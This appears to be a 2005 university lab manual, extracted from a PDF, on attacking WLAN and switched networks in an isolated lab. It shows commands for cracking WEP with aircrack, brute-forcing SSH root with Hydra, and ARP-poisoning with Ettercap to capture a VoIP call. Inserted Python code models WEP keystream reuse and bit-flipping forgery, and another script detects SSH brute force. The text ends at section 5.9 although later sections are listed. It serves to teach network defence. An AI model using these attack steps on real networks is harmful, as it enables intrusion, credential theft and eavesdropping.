Laboratorytest Security in WLAN and in switched networks


Laboratorytest

Security in WLAN and in switched networks

Malte Spille

December 18, 2005


Contents

1 Introduction
2 Exercise Basics
  2.1 General
  2.2 Linux
  2.3 Software
3 Preparation questions
4 Laboratory configuration
  4.1 Topology
  4.2 Components and systems
5 Execution
  5.1 WLAN-Configuration
  5.2 Basic Configuration Host A/B
    5.2.1 Host A
    5.2.2 Host B
  5.3 WLAN-Scan
  5.4 WEP-Decryption
  5.5 Configuration Sip-Clients
  5.6 Connection Wardriver
  5.7 Service-Detection SIP and SSH
  5.8 SSH-Bruteforce-Attack against Host C
  5.9 VoIP-Capture
  5.10 VoIP-Block
  5.11 Password-Sniffing FTP-Account
  5.12 WLAN-protection with OpenVPN
6 Interpretation of test results


List of Figures

4.1 Topology


Chapter 1

Introduction

Networks keep spreading. For enterprises, in which the protection of sensitive data is particularly important, this spread means becoming a target for attacks, because the complexity of the network grows constantly. The lab test "Security in WLAN and in switched networks" deals with the question of how unauthorized users can compromise an enterprise network by attacks on WLAN and LAN. From the point of view of a wardriver, an attempt is made to gain access to a network, to discover weak points, to exploit them and finally to obtain sensitive data or the passwords of administrative accounts. The disruption, up to the complete shutdown, of elementary services such as voice communication by means of "Voice over IP" (VoIP) is also examined. The exercise serves to show where the points of attack in the deployed technology are, how and with which tools they can be exploited, and how one can protect oneself against the described attacks.


Chapter 2

Exercise Basics

This chapter conveys the knowledge needed to work through the exercise correctly. The software, Linux basics and the topology of the enterprise network are explained. A short examination before the start of the exercise is required before the test can be carried out.

2.1 General

- What do entries marked with "<" and ">" in listings mean? Entries within these brackets have to be replaced by group- or hardware-dependent values.

- What is a "Bruteforce" attack? A bruteforce attack is the systematic trying of login/password combinations with the aim of obtaining (administrative) access to the target system. In practice these attacks are mostly carried out with dictionary lists, which is why it is advisable not to use "weak" passwords.

- I have a question concerning the accesspoint configuration! Use the official Cisco documentation [2] on the "Auditor LiveCD" in the directory "/home/knoppix/Desktop/Documents".

- Where is the test file? The test file is in "/home/stud", the home directory of the user "stud", on your group's FTP server.

- How do I use my USB stick? If your USB stick is not recognized automatically, mount it by hand. First create a mount point:

root@host#mkdir /mnt/usb

"Mount" the USB stick into this folder. In most cases the USB stick is accessible as /dev/sda1:

root@host#mount /dev/sda1 /mnt/usb

You can now copy files to /mnt/usb and work on the file system. When you are done, unmount the USB stick with:

root@host#umount /mnt/usb

(note the spelling: umount, without "n")

2.2 Linux

- How can I differentiate between the interfaces? "ifconfig" gives an overview of all activated interfaces. With the additional parameter "-a", inactive interfaces are shown as well. Identify your WLAN card by comparing the MAC addresses.

- How can I get help for a program? "<program> -h" gives a short overview of the options. For a detailed description use the man pages: "man <program>". There is also a command overview in the "Documents" folder on the "Auditor LiveCD" (linuxquickref.jpg) and a detailed program description in "gnu-linux-tools-summary.pdf".

- What does a \ in console listings mean? A \ represents a line break inside one command. You can use copy & paste; the shell interprets the line continuation correctly.

- What does a . mean? A dot in a Linux command denotes the current directory. The command:

root@Host#cp /home/testuser/test .

copies the file "test" from the home directory of the user "testuser" into the current directory.

- Elementary Linux commands:

  pwd                                   Shows the current path
  cd [directory]                        Changes to directory
  ls [options] [directory]              Shows the content of a directory
  mkdir [options] [directory]           Creates a new directory
  touch file                            Creates a new file
  cat file                              Shows content of file
  clear                                 Clears the shell content
  mv [options] file target-directory    Moves file into target-directory
  find [directory] [search criterion]   Searches in directory

2.3 Software

1. Kismet
Used Version: 2005.04.R1
Webpage: http://www.kismetwireless.net/
Description: Kismet is a WLAN scanner that can output detailed information about surrounding WLANs.

2. Aircrack
Used Version: 2.1
Webpage: http://www.cr0.net:8040/code/network/
Description: Aircrack is a program suite consisting of the programs airodump, aireplay, aircrack and airdecap. Aircrack makes it possible to recover the WEP key of 802.11 networks.

3. Ettercap
Used Version: NG-0.71
Webpage: http://www.ettercap.sourceforge.net/
Description: Ettercap is a program suite that can carry out various "Man-in-the-Middle" attacks. Sniffing live connections is possible, as is manipulating them. Ettercap offers an interface for self-written filters.

4. Ethereal
Used Version: 0.10.11
Webpage: http://www.ethereal.com/
Description: Ethereal is a network protocol analyser. It is used for network analysis, troubleshooting and protocol development. There are versions for Unix, Linux and Windows.

5. Tethereal
Used Version: 0.10.10
Webpage: http://www.ethereal.com/docs/man-pages/tethereal.1.html
Description: Tethereal is the console-based version of Ethereal.

6. Dsniff
Used Version: 2.4
Webpage: http://www.naughty.monkey.org/~dugsong/dsniff/
Description: Dsniff consists of various programs for security analysis within networks. For example, it is possible to capture passwords using a "Man-in-the-Middle" attack. Supported services and protocols are FTP, Telnet, SMTP, HTTP, POP, poppass, NNTP, IMAP, SNMP, LDAP, Rlogin, RIP, OSPF, PPTP MS-CHAP, NFS, YP/NIS, SOCKS, X11, CVS, IRC, AIM, ICQ, Napster, PostgreSQL, Meeting Maker, Citrix ICA, Symantec pcAnywhere, NAI Sniffer, Microsoft SMB, Oracle SQL*Net, Sybase and Microsoft SQL.

7. X-Lite
Used Version: 2.0
Webpage: http://www.xten.com/
Description: X-Lite is a SIP-based softphone from CounterPath Solutions, Inc. X-Lite supports the codecs G.711u, G.711a, GSM, iLBC and Speex.

8. Nmap
Used Version: 3.75
Webpage: http://www.insecure.org/nmap/
Description: Nmap is a network scanner. Nmap can show detailed information such as running services, active hosts and the operating systems in use. Scanning of IP ranges is supported.

9. Hydra
Used Version: 4.4
Webpage: http://www.thc.org
Description: Hydra is a password bruteforcer. Supported services are TELNET, FTP, HTTP-GET, HTTP-HEAD, HTTPS-GET, HTTPS-HEAD, HTTP-PROXY, LDAP2, LDAP3, SMB, SMBNT, MS-SQL, MYSQL, POSTGRES, REXEC, SOCKS5, VNC, POP3, IMAP, NNTP, PCNFS, ICQ, SAPR3, Cisco auth, Cisco enable, SMTP-AUTH, SSH2, SNMP, CVS and Cisco AAA. Dictionary attacks are supported.

10. pcattcp
Used Version: 2.01.01.08
Webpage: http://www.pcausa.com/Utilities/pcattcp.htm
Description: pcattcp is a Windows port of the Unix program "ttcp". ttcp is a tool for measuring throughput. TCP and UDP are supported.

11. Asterisk
Used Version: 1.0.7
Webpage: http://www.asterisk.org/
Description: Asterisk is a free software telephone system (PBX). Asterisk supports the VoIP protocols SIP and H.323. Its range of functions exceeds that of a conventional telephone system.

12. vsftpd
Used Version: 2.0.3
Webpage: http://vsftpd.beasts.org/
Description: vsftpd is an FTP server. It is released under the GPL license and is available for Unix and Linux.

13. DHCP3-Server
Used Version: 3.0.1-2
Webpage: http://www.isc.org/index.pl
Description: DHCP3 is a Dynamic Host Configuration Protocol (DHCP) server. Its task is the dynamic assignment of IP addresses to computers. DHCP3 runs under UNIX, Linux and Solaris.

14. OpenSSH
Used Version: 3.8.1p1
Webpage: http://www.openssh.com/
Description: OpenSSH is a free implementation of SSH and offers an encrypted connection to SSH systems. SSH is used for remote maintenance and is considered a secure replacement for telnet and rlogin. In addition OpenSSH contains a program for secure copying of files (scp) and an FTP-like file transfer over the secured connection (sftp).

15. OpenVPN
Used Version: 2.0
Webpage: http://openvpn.net/
Description: OpenVPN is an open-source VPN implementation. It establishes an encrypted connection between two (or more) networks over an insecure medium. SSL/TLS is used for the encryption. OpenVPN is used, for example, to connect two locations of an enterprise or to secure an 802.11 network.

16. User Mode Linux
Used Version: depends on the kernel version
Webpage: http://user-mode-linux.sourceforge.net/
Description: User Mode Linux is an extension of the Linux kernel that enables a host system to run multiple virtual systems. It is possible, for example, to start one or more Linux systems as processes within another Linux system, so that several virtual hosts operate at the same time on one physical system. Typical uses are software development and testing and network engineering.

17. Debian GNU/Linux
Used Version: 31r0a (sarge)
Webpage: http://www.debian.org/
Description: Debian is a free operating system that builds on software of the GNU project (http://www.gnu.org/). Debian is free of charge and freely available. It is frequently used on server systems and offers a high degree of flexibility and scalability.

18. Auditor Linux
Used Version: 200605-02
Webpage: http://new.remote-exploit.org/
Description: Auditor is a Linux LiveCD based on the Knoppix LiveCD. Auditor does not need to be installed and its use does not affect other operating systems on the machine. Auditor extends the standard Knoppix distribution with programs from the field of network security. It is released under the GPL 2.0 license. Among others, Auditor is used by the NSA and the US Air Force. For the lab test the following components were added to or removed from the standard distribution:

Added:

- Scripts (/home/knoppix/Desktop/Scripts)
  - sip-block.txt (Ettercap filter for SIP blocking, uncompiled)
  - sip-block.ef (Ettercap filter for SIP blocking, compiled)
- Documents (/home/knoppix/Desktop/Documents)
  - gnu-linux-tools-summary.pdf [1] (detailed documentation of Linux commands)
  - aironet_ap_configuration.pdf [2] (documentation of the accesspoint Cisco 1200)
  - linuxquickref.jpg [3] (short documentation of Linux commands)
- Configurations (/home/knoppix/Desktop/Configurations); the configurations for the services ssh, Asterisk and vsftpd are not listed here, because they are contained in the UML files
  - OpenVPN:
    - vpn_wlan_Server1.conf (configuration Server 1)
    - vpn_wlan_HostB_1-5.ovpn (configuration Host B)
    - dh2048.pem
    - vpn_wlan-ca.crt
    - Server.key
    - Server.crt
    - HostB_1-5.crt
    - HostB_1-5.key
  - DHCP3-Server:
    - dhcpd.conf (configuration DHCP3-Server)
- Thesis (/home/knoppix/Desktop/Thesis)
  - Laborversuch_Sicherheit.pdf (lab test "Sicherheit im WLAN und in geswitchten Netzen", German)
  - Laboratorytest_Security.pdf (lab test "Security in WLAN and in switched networks", English)
  - Diplomarbeit_MalteSpille.pdf (thesis "Sicherheit im WLAN und in geswitchten Netzen")
- Other (/home/knoppix/Desktop/Other)
  - ttcpzip.exe (program pcattcp)
  - openvpn-2.0.2-install.exe (program OpenVPN)
  - x_lite-counterpath_Win32_1105x_21407.exe (program X-Lite)
  - Password.txt (password list for the SSH bruteforce)
  - Wallpaper.jpg (wallpaper)

Removed:

- Programs/Packages
  - wine-utils
  - wine
  - libwine


Chapter 3

Preparation questions

To ensure a fast and problem-free execution of the lab test you have to answer the following preparation questions. They serve a better understanding and should facilitate the later handling of the tasks.

1. How does WEP work? Where are the weak points of WEP?

2. What is a VPN? How does a VPN work?

3. Give the advantages of a switched network. Compare the function of a switch with the function of a hub.

4. What is a Man-in-the-Middle (Monkey-in-the-Middle) attack?

5. What is ARP poisoning / ARP spoofing?


Chapter 4

Laboratory configuration

This chapter gives an overview of the topology used. The aim is to give an understanding of the components used, their operating systems and their placement within the enterprise network.

4.1 Topology

The enterprise network is divided into two segments, a WLAN segment and a LAN segment. Computers connected over the WLAN (except Host B) receive an IP address from the network 192.168.1.0/24 (range 192.168.1.230-192.168.1.250) via DHCP. Computers in the LAN segment have a static IP address from the network 192.168.0.0/24.
Both segments are separated by Server 1, which operates as DHCP server and routes between them. For this purpose Server 1 has two network interface cards. Later in the laboratory exercise Server 1 additionally acts as VPN gateway (OpenVPN) to secure the WLAN connection.
The LAN segment contains a switch, which connects Host A, Host C, Server 1 and Server 2.
There are two authorized hosts in the LAN segment (Host A and Host C) and one authorized host in the WLAN segment (Host B). Host B is associated with an accesspoint, which is connected through a hub to Server 1 and thus to the LAN segment. Host C is prepared separately for each group as a "user mode linux" instance, i.e. it runs as a virtual system. Each Host C is reachable at the IP address 192.168.0.10x/24, where x is the group number (this convention is used throughout the document). Host C offers an SSH service for remote maintenance.
Host D is not authorized. It is the computer of the wardriver, which is used for the attacks on the enterprise network.
Server 2 is likewise prepared with UML. Server 2 offers the Asterisk server and the FTP server "vsftpd". Server 2 is reachable for each group at 192.168.0.3x/24.


Figure 4.1: Topology


4.2 Components and systems

Operating systems:

- Microsoft Windows 2000 Prof.: Host A, Host B
- Debian GNU/Linux 31r0a (sarge): Server 1, Server 2 (via UML), Host C (via UML)
- Auditor Linux: Host D

Used by all groups:

- Server 1
- Hub
- Switch

Used by one group:

- Host A, Host B, Host D
- Server 2 (1 physical PC, 5 via UML)
- Host C (1 physical PC, 5 via UML)
- Accesspoint


Chapter 5

Execution

5.1 WLAN-Configuration

Target:

- Configuration of the accesspoint

To deliver:

- Conf_AP_x (x is the group number, here and in all following names)

To use:

- Accesspoint
- Host A

The aim is to provide a rudimentarily configured accesspoint, which is needed for the rest of the lab test. The document aironet_ap_configuration.pdf [2] is available to you; it is located in "/home/knoppix/Desktop/Documents" and contains all necessary commands. For the configuration you can use Microsoft's "Hyperterminal" or "minicom", which is included on the Auditor LiveCD.

1. Establish the physical connection over the console-port of Host A tothe accesspoint.


- 9600 bps
- Databits 8
- No flow control
- Password: Cisco

2. Set the hostname to ap_x.

3. Delete the default SSID "tsunami".

4. Set the SSID to group_x.

5. Set the channel. For the first part of the exercise we deliberately want to produce interference. For this, groups 1 and 2 set their channel to 6 and groups 3, 4 and 5 set theirs to 11.

6. Set the authentication mode to "open".

7. Activate the "guest-mode".

8. Activate WEP and set a 40-bit WEP key. Use unencrypted input.

9. Set the IP address of the ethernet interface to 192.168.1.x0/24. Do not configure the FastEthernet interface but the bridge interface "BVI"; both the WLAN and the ethernet interface are then reachable under the same IP address.

10. Set the default gateway to 192.168.1.2.

11. Connect the ethernet interface to the hub according to the topology.

12. Save the configuration: Conf_AP_x.

5.2 Basic Configuration Host A/B

Target:

- Configuration of Host A and Host B
- Connectivity tests
- Throughput tests


To deliver:

- pcattcp-Scan_x_1
- pcattcp-Scan_x_2

To use:

- Host A
- Host B

Create the physical connection in accordance with illustration 4.1.

5.2.1 Host A

1. Deactivate the fiber connection (Allied Telesyn AT-2700FX).

2. Activate the ethernet card "3com EtherLink XL".

3. Set the IP address of Host A to 192.168.0.1x1/24.

4. Set the default gateway to 192.168.0.2.

5. Make sure you can reach Server 1 and Server 2. After the configuration of Host B you should also be able to reach Host B.

5.2.2 Host B

1. Deactivate the fiber connection (Allied Telesyn AT-2700FX).

2. Activate the WLAN card "Cisco Systems 350 Series PCI Wireless LAN Adapter".

3. Set the IP address of Host B to 192.168.1.1x2/24.

4. Set the default gateway to 192.168.1.2.

5. Use the "Aironet Client Utility" to configure the WLAN settings (WEP, SSID, etc.). Create a new profile. Make sure Host B is associated with the accesspoint belonging to your group.

6. Connect Host B with the network.

7. Make sure you can reach Host A, Host C and Server 2.

8. Use pcattcp to show the throughput loss caused by overlapping channels. For this, group 1 cooperates with group 2, and groups 3 and 4 with group 5. First make sure you can reach the Host B of the other group(s). Try to keep the conditions as constant as possible (distance to the AP, etc.). After opening the Windows console, change to the pcattcp directory:

C:\>cd C:\Programme\pcattcp

One group starts pcattcp in receiver-mode on Host B:

C:\Programme\pcattcp>pcattcp -r

Host B of the second group starts pcattcp with

C:\Programme\pcattcp>pcattcp -t <IP Host B group 1>

The throughput tests can take some minutes. Repeat these steps to obtain significant results.

9. Create a screenshot of the pcattcp scan. Name: pcattcp-Scan_x_1.

10. Coordinate with the other groups and choose channels such that, if possible, no interference arises. Make new pcattcp scans. The throughput should now be better.

11. Create a screenshot of the new pcattcp scan. Name: pcattcp-Scan_x_2.

5.3 WLAN-Scan

Target:

- Scan the WLAN
- Detect group-specific WLAN information

To deliver:

- WLAN-Scan_x

To use:

- Host D

We try to connect Host D to the encrypted company network. Consider that Host D is an unauthorized participant. First use the tool "Kismet" to find the surrounding WLANs.

1. Start "Kismet" via the menu entry Auditor > Wireless > Scanner/Analyzer > Kismet tools > Kismet.

2. For the dump files use the "tmp" directory in "/ramdisk/home/knoppix". Keep the other settings.

3. Search for the network of your group and display its detailed information ("h" shows the help). Should your network not show up, try "Probe Networks". If you still cannot find your network, use the program "iwlist" to list nearby WLANs:

root@HostD#iwlist wifi0 scan

4. Create a screenshot of the scan with "KSnapshot" (Applications > Graphics > KSnapshot). Name: WLAN-Scan_x. You can use "Konqueror" to view the image. If you kept the standard path, click on the house symbol to move to your home directory; the screenshot should be there.

5. Quit �Kismet� with �Shift+q�.

5.4 WEP-Decryption

Target:

- Configuration of the WLAN card
- Recovery of a WEP key (40 bit)

To deliver:

- WEP-Key_x

To use:

- Host D

Now we try to recover the WEP key with Host D. We use the programs "airodump" and "aircrack" of the "Aircrack" suite.

1. Open up a console.

2. Associate Host D with your accesspoint. Compare the MAC address of your card with the output of "ifconfig -a" and use the matching ethX as <intf>. Do not mix up wifiX (used only for monitor mode) and ethX.

root@HostD#iwconfig <intf> essid group_x

3. Check if Host D is associated with the accesspoint of your group:

root@HostD#iwconfig

Behind "Access Point" the BSSID of your group's accesspoint should be shown. If it is not, make sure that your accesspoint has "guest-mode" enabled and that "SSID broadcast" is activated. Make sure you deleted the default SSID "tsunami", too. Alternatively you can try to set the BSSID directly:

root@HostD#iwconfig <intf> ap <BSSID>

Make sure you are associated with the accesspoint before proceeding with the next step.

4. Start airodump to collect initialization vectors (IVs):

root@HostD#airodump wifi0 dump <BSSID>

The BSSID should be visible on the screenshot "WLAN-Scan". Keep in mind to use the correct network interface (the wifiX monitor interface here).

5. Establish a connection from Host B to the FTP server at 192.168.0.3x. Use the account "stud"; the password is "rtk222". Transfer the sample file from the home directory of "stud" to Host B. The number of collected IVs should now increase quickly. You need about 130000 IVs, which takes about 10 minutes. In the meantime start with "Configuration Sip-Clients". (Aircrack also offers attacks, via aireplay, that make the accesspoint generate artificial traffic, which can be used against networks with little traffic. This depends on the hardware and is not supported by the Cisco cards used here.)

6. After collection of 130000 IVs start �Aircrack� to calculate the WEP-Key:

root@HostD#aircrack -n 64 dump.cap

Note that the probability of recovering the WEP key rises with the number of IVs but never reaches 100%. With 130000 IVs the probability of finding the key should be about 60%. Collecting more IVs improves the chances; since only limited bandwidth is available, however, agree with the other groups if you want to collect more than 130000 IVs. If you do not obtain the key, continue with the key you configured on the accesspoint as if it had been recovered; you have seen how the procedure works.

7. Create a screenshot of the key with "KSnapshot". Name: WEP-Key_x. If you did not recover the key, take a screenshot of the aircrack output under the same name.
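The two weaknesses that make the IV collection above pay off, shown on a toy model of WEP framing. This is an added example, not part of the lab manual or of the Aircrack suite: the 40-bit key, the IV and the two plaintexts are constructed for the demonstration; the RC4 cipher, the CRC-32 ICV and the IV-prefix key construction follow the 802.11 WEP design.

```python
"""Added example (not part of the lab manual): a toy model of WEP framing
that shows why collecting IVs (section 5.4) and preparation question 1
matter.  Key, IV and plaintexts below are constructed for the demo."""
import zlib


def rc4(key: bytes, length: int) -> bytes:
    """Return `length` bytes of RC4 keystream for `key` (KSA followed by PRGA)."""
    s = list(range(256))
    j = 0
    for i in range(256):                       # key-scheduling algorithm
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):                    # pseudo-random generation
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(key40: bytes, iv: bytes, payload: bytes) -> bytes:
    """WEP data field: IV (3 bytes, sent in clear) || RC4(IV || key, payload || ICV).
    The ICV is a plain CRC-32 over the payload, i.e. not a keyed MAC."""
    assert len(key40) == 5 and len(iv) == 3, "40-bit key, 24-bit IV"
    icv = zlib.crc32(payload).to_bytes(4, "little")
    keystream = rc4(iv + key40, len(payload) + 4)
    return iv + xor(payload + icv, keystream)


def wep_decrypt(key40: bytes, frame: bytes):
    """Return (payload, icv_ok) for a frame produced by wep_encrypt."""
    iv, body = frame[:3], frame[3:]
    plain = xor(body, rc4(iv + key40, len(body)))
    payload, icv = plain[:-4], plain[-4:]
    return payload, zlib.crc32(payload).to_bytes(4, "little") == icv


def keystream_reuse(frame1: bytes, frame2: bytes) -> bytes:
    """Weakness 1: two frames with the same IV use the same keystream, so
    C1 ^ C2 == P1 ^ P2 without knowing the key.  With only 2^24 IVs a busy
    access point repeats them quickly; the FTP transfer in step 5 of
    section 5.4 is what produces that traffic."""
    assert frame1[:3] == frame2[:3], "frames must share the IV"
    return xor(frame1[3:], frame2[3:])


def flip_bits(frame: bytes, offset: int, mask: bytes) -> bytes:
    """Weakness 2: CRC-32 is linear, crc(P ^ D) == crc(P) ^ crc(D) ^ crc(0^n),
    so an attacker can XOR `mask` into the encrypted payload and patch the
    encrypted ICV without the key; the receiver still accepts the frame."""
    n = len(frame) - 3 - 4                                   # payload length
    delta = bytes(offset) + mask + bytes(n - offset - len(mask))
    icv_delta = zlib.crc32(delta) ^ zlib.crc32(bytes(n))
    body = bytearray(frame[3:])
    for k, m in enumerate(mask):
        body[offset + k] ^= m
    icv = int.from_bytes(body[-4:], "little") ^ icv_delta
    body[-4:] = icv.to_bytes(4, "little")
    return frame[:3] + bytes(body)


def demo():
    """Run both attacks on constructed frames; returns the recovered values."""
    key = bytes.fromhex("0102030405")        # constructed 40-bit key
    iv = b"\x00\x00\x01"                     # the same IV used twice
    p1, p2 = b"HELLO Host B", b"hello host A"
    f1, f2 = wep_encrypt(key, iv, p1), wep_encrypt(key, iv, p2)
    p1_xor_p2 = keystream_reuse(f1, f2)[:len(p1)]
    recovered_p2 = xor(p1_xor_p2, p1)        # knowing/guessing p1 reveals p2
    tampered = flip_bits(f1, 6, b"\x20\x20\x20\x20")   # flip the case of "Host"
    return recovered_p2, wep_decrypt(key, tampered)


if __name__ == "__main__":
    print(demo())
```

aircrack's statistical attack goes further and recovers the key itself from the weak-IV frames, which is why the page asks for about 130000 IVs; the keystream reuse and the bit flipping shown here need no key at all and apply equally to 104-bit WEP, since neither the IV length nor the ICV changes with the key size.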

5.5 Configuration Sip-Clients

Target:

- Configuration of the "X-Lite" softphones on Host A and Host B
- Performing test calls

To deliver:

- none

To use:

- Host A
- Host B

Configure Host A and Host B for the use of the Asterisk server and establish a VoIP connection between Host A and Host B.

1. Configuration of the X-Lite client:

- Sip Proxy > Default:
  - Enabled: Yes
  - Display Name: labor_x_y (y = a for Host A, b for Host B; note the lower case)
  - Username: labor_x_y
  - Authorization User: labor_x_y
  - Password: labor_x_y
  - Domain/Realm: 192.168.0.3x
  - Sip Proxy: 192.168.0.3x
  - Out Bound Proxy: 192.168.0.3x

2. Test the settings with test calls between Host A and Host B. The number is x10y (y = 1 for Host A, 2 for Host B). If problems occur, test your connection to the Asterisk server with a call to the number 663. If everything is configured correctly you hear a demo announcement.

5.6 Connection Wardriver

Target:

- Configuration of the WLAN card
- Establishment of a connection from Host D into the WLAN segment
- Performing connectivity tests

To deliver:

- Ping_x

To use:

- Host D

We want to connect the unauthorized PC Host D to the group WLAN using the captured WEP key.

1. Open up a console and set the WLAN-card into �Managed�-mode:

root@HostD#iwconfig <intf> mode Managed

2. Set the parameters of the connection (replace the x's in the key with the captured 40-bit WEP key, 10 hexadecimal digits):

root@HostD#iwconfig <intf> essid group_x

root@HostD#iwconfig <intf> key xxxx-xxxx-xx

3. Request an IP with DHCP:

root@HostD#dhclient <intf>

4. Make a broadcast-ping to see all hosts within the network:

root@HostD#ping -b 192.168.1.255

5. Create a screenshot of the "ping" with "KSnapshot". Name: Ping_x

5.7 Service-Detection SIP and SSH

Target:

� Scanning of the network for SIP-services

� Scanning of the network for SSH-services

To deliver:

� SIP-Detection_x1

� SSH-Detection_x1

To use:

� Host D

You have a connection to the network and want to �nd interesting services,especially VoIP. This is why we look for Hosts o�ering a service at SIP-port5060. Use the network-scanner Nmap:

1. Start Nmap (Auditor> Scanning> Network Scanners> NmapFE)

� Targets: 192.168.0.*

� Scan Type: UDP-Port Scan

6x replace with WEP-Key

26

Page 28: Laboratorytest Security in WLAN and in switched · PDF fileLaboratorytest Security in WLAN and in switched ... 14 4.2 Components and ... stud of the user stud on your groups FTP-Server.

5.8. SSH-Bruteforce-Attack against Host C CHAPTER 5. Execution

� Scanned Ports (Range Given Below): 5060

2. Nmap will give a list. Look for for the message �open|�ltered�, theassociated computers are indicated with IP. These are the Asterisk-Servers, which o�ers a SIP-service at port 5060(udp) and already con-nected SIP-clients. In order to di�erentiate between the Clients and theservers, further scans could be performed. We presuppose the server at192.168.0.3x1 as given.

3. Create a screenshot of the scan with �KSnapshot�. Name: SIP-Detection_x1

4. Now, that you have found the Asterisk-Server, you have to try to �nda way into the 192.168.0.0/24-network. Test if a system o�ers a SSH-service (port 22) for remote-access. Use again Nmap:

• Targets: 192.168.0.*

• Scan Type: SYN Stealth Scan

• Scanned Ports (Range Given Below): 22

At port 22 of Host C (192.168.0.10x1) an SSH-service listens. Use it to gain access to the network 192.168.0.0/24.

5. Create a screenshot of the scan with "KSnapshot". Name: SSH-Detection_x1

5.8 SSH-Bruteforce-Attack against Host C

Target:

• Determination of the password for the SSH-login of user "root" on Host C

• Establishment of a connection via SSH to Host C

• Performing of connectivity-tests

To deliver:

• SSH-PW_x1

• Ping-SSH-HostC_x1

To use:

• Host C

• Host D

To gain access to 192.168.0.10x1, start a bruteforce-dictionary attack. You try to gain root-access directly. Use the program Xhydra (Auditor> Bruteforce> Xhydra):

• Single Target: 192.168.0.10x1

• Port: 22

• Protocol: ssh2

• Use SSL: yes

• Username: root

• Password List: Password.txt (Directory /home/knoppix/Desktop/Other)

1. Start Xhydra with the given parameters. You should get the password after a while.

2. Create a screenshot of the password with "KSnapshot". Name: SSH-PW_x1

3. Use the password to login at the Asterisk-Server via SSH:

root@HostD#ssh root@192.168.0.10x1

You should be able to reach all Hosts within the network 192.168.0.0/24. Try to ping Host A, Host B and Server 2.

4. Create a screenshot of the pings with "KSnapshot". Name: Ping-SSH-HostC_x1
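Seen from Host C, the dictionary attack above leaves a characteristic trace in the sshd log: a burst of failed password logins from one address, followed by a successful one. The following Python script is an added example (not part of the lab manual or of the Auditor tools) that finds exactly that pattern; the log lines, host name, addresses and timestamps in it are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sshd auth-log excerpt for Host C (syslog format); not a capture from the lab.
SAMPLE_LOG = """\
Dec 18 14:03:01 hostc sshd[2101]: Failed password for root from 192.168.0.50 port 40122 ssh2
Dec 18 14:03:01 hostc sshd[2101]: Failed password for root from 192.168.0.50 port 40122 ssh2
Dec 18 14:03:02 hostc sshd[2103]: Failed password for root from 192.168.0.50 port 40130 ssh2
Dec 18 14:03:02 hostc sshd[2105]: Failed password for invalid user admin from 192.168.0.50 port 40131 ssh2
Dec 18 14:03:03 hostc sshd[2107]: Failed password for root from 192.168.0.50 port 40140 ssh2
Dec 18 14:03:04 hostc sshd[2109]: Accepted password for root from 192.168.0.50 port 40150 ssh2
Dec 18 14:10:00 hostc sshd[2200]: Failed password for root from 192.168.0.7 port 51000 ssh2
Dec 18 14:11:00 hostc sshd[2201]: Accepted publickey for stud from 192.168.0.7 port 51002 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Accepted|Failed) (?P<method>\w+) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>[\d.]+) port \d+"
)

def parse_line(line, year=2005):
    """Parse one sshd syslog line; syslog omits the year, so it is supplied here."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return {"ts": ts, "result": m["result"], "method": m["method"],
            "user": m["user"], "ip": m["ip"]}

def detect_bruteforce(log_text, threshold=5, window_seconds=60):
    """Flag sources with >= threshold password failures inside a sliding window and
    record any account they log into afterwards (the guess that landed)."""
    events = [e for e in map(parse_line, log_text.splitlines()) if e]
    recent = defaultdict(list)   # ip -> timestamps of recent password failures
    alerts = {}
    for e in sorted(events, key=lambda e: e["ts"]):
        ip = e["ip"]
        recent[ip] = [t for t in recent[ip] if (e["ts"] - t).total_seconds() <= window_seconds]
        if e["result"] == "Failed" and e["method"] == "password":
            recent[ip].append(e["ts"])
            if len(recent[ip]) >= threshold:
                alerts.setdefault(ip, {"failures": 0, "compromised_users": []})
                alerts[ip]["failures"] = len(recent[ip])
        elif e["result"] == "Accepted" and ip in alerts:
            alerts[ip]["compromised_users"].append(e["user"])
    return alerts
```

Run against the sample, it reports 192.168.0.50 with five failures and a subsequent root login, while the single failure from 192.168.0.7 stays below the threshold.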

5.9 VoIP-Capture

Target:

• Performing of a MITM-attack between Server 2 and Host A

• Capture VoIP-call on Host C

• Transfer of the call-dumpfile to Host D

• Analysis and playback of the call at Host D

To deliver:

• RTP-Streams_x1

• RTP-Analysis_x1

To use:

• Host C

• Host D

Since we now have access to the network 192.168.0.0/24, we want to capture a conversation between two VoIP-participants. We use "Ettercap" and start a "Man-in-the-Middle"-attack by means of ARP-Poisoning between Host A and the Asterisk server. Please note that under normal conditions programs like Ettercap would not be installed on a production system. One would have to install these e.g. via ssh.

1. In order to pass redirected packets on to their original receiver, you must activate IP-forwarding on Host C:

root@UMLHostC_x1#echo "1" > /proc/sys/net/ipv4/ip_forward

2. Test which interface (ethx) you can use on Host C:

root@UMLHostC_x1#ifconfig -a

3. Start Ettercap:

root@UMLHostC_x1#ettercap -i <intf> -Tqo -M arp:remote \
    /192.168.0.3x1,1x11/

4. Start a second SSH-connection to Host C and use the program Tethereal in order to capture arriving data-packets. Note that you have to begin with the conversation immediately after starting Tethereal.

root@UMLHostC_x1#tethereal -i <intf> -f udp -w dump_x1

5. Make a short call between Host A and Host B.

6. When finished, stop the recording and Ettercap. Important: do not stop Ettercap with CTRL+c or by simply closing the console. Always use "q", so that Ettercap can restore the poisoned ARP-tables of the victims on exit.

7. Copy "dump_x1" with Secure-Copy (scp) from Host C to Host D:

root@HostD#scp root@192.168.0.10x1:dump_x1 .

The password to use is the SSH-password.

8. Open the file with Ethereal (Auditor> Analyzer> Network> Ethereal) on Host D.

9. Mark a RTP-packet> Statistics> RTP> Show All Streams> Mark the streams in both directions (Payload = ITU-T G.711 PCMU)> Analyze> Save payload> Save as <file>

10. Create a screenshot of the RTP-streams with "KSnapshot". Name: RTP-Streams_x1

11. Create a screenshot of the RTP-stream-analysis with "KSnapshot". Name: RTP-Analysis_x1

12. Use the console-program "play" for playback:

root@HostD#play /home/knoppix/<file>
